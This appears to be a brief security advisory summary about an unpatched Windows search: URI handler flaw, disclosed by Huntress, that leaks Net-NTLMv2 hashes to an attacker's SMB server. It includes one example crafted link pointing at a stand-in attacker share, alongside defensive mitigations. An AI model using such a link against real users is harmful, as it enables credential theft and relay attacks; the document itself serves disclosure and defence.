Huntress has disclosed an unpatched Windows vulnerability in the search: URI handler that can leak a user's NTLMv2 hash to an attacker. It mirrors CVE-2026-33829 - the Snipping Tool ms-screensketch: handler flaw Microsoft patched in April - achieving the same end via search:query and crumb=location: parameters pointing at an attacker UNC path (for example, search:query=test&crumb=location:\\attacker\share). If the user approves launching the crafted link from a web page or email, Windows connects to the attacker's SMB server and discloses the Net-NTLMv2 hash, which can be relayed or cracked to authenticate as the user. No patch is currently available; defenders should block outbound SMB and apply Huntress mitigations.